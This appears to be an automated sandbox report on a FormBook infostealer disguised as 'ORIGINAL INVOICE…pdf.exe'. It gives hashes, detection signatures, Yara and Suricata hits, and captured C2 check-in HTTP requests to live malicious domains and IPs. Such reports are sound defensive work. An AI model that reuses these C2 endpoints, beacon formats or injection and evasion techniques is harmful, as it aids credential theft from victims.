Windows Analysis Report
ORIGINAL INVOICE COAU7230734298.pdf.exe

Overview

General Information

Sample name: ORIGINAL INVOICE COAU7230734298.pdf.exe
Analysis ID: 1523775
MD5: 7d3ee1a73d9fbef171c785801ffcaff2
SHA1: 2ad9a95c9038e4d61c6d9cbee63746454454d502
SHA256: 1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
Tags: exe, user-ngokoptmp

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Virustotal: Detection: 38%
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe ReversingLabs: Detection: 28%
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Joe Sandbox ML: detected
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose, 8_2_0327C000
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then xor eax, eax 8_2_03269B70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then mov ebx, 00000004h 8_2_03D304DE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then pop edi 9_2_058C2FA0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then xor eax, eax 9_2_058C7839
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then pop edi 9_2_058D2ACE

Networking

Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56830 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56834 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56825 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56835 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56827 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56833 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56829 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56831 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56826 -> 85.159.66.93:80
Source: DNS query: www.kartal-nakliyat.xyz
Source: Joe Sandbox View IP Address: 52.223.13.41
Source: Joe Sandbox View ASN Name: AMAZONEXPANSIONGB
Source: Joe Sandbox View ASN Name: AS_LYREG3FR
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.yippie.worldUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.kartal-nakliyat.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.sidqwdf.funUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.resellnexa.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic DNS traffic detected: DNS query: www.yippie.world
Source: global traffic DNS traffic detected: DNS query: www.kartal-nakliyat.xyz
Source: global traffic DNS traffic detected: DNS query: www.sidqwdf.fun
Source: global traffic DNS traffic detected: DNS query: www.resellnexa.shop
Source: unknown HTTP traffic detected: POST /n8ew/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeCache-Control: max-age=0Content-Length: 199Content-Type: application/x-www-form-urlencodedHost: www.kartal-nakliyat.xyzOrigin: http://www.kartal-nakliyat.xyzReferer: http://www.kartal-nakliyat.xyz/n8ew/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 02 Oct 2024 00:06:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693090420.0000000005A07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlru-ru
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.resellnexa.shop
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.resellnexa.shop/sfpe/
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033y
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RpcPing.exe, 00000008.00000003.2428440920.00000000084B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0042BFF3 NtClose, 3_2_0042BFF3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52B60 NtClose,LdrInitializeThunk, 3_2_01A52B60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_01A52DF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_01A52C70
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A535C0 NtCreateMutant,LdrInitializeThunk, 3_2_01A535C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A54340 NtSetContextThread, 3_2_01A54340
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A54650 NtSuspendThread, 3_2_01A54650
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BA0 NtEnumerateValueKey, 3_2_01A52BA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52B80 NtQueryInformationFile, 3_2_01A52B80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BE0 NtQueryValueKey, 3_2_01A52BE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BF0 NtAllocateVirtualMemory, 3_2_01A52BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AB0 NtWaitForSingleObject, 3_2_01A52AB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AF0 NtWriteFile, 3_2_01A52AF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AD0 NtReadFile, 3_2_01A52AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DB0 NtEnumerateKey, 3_2_01A52DB0
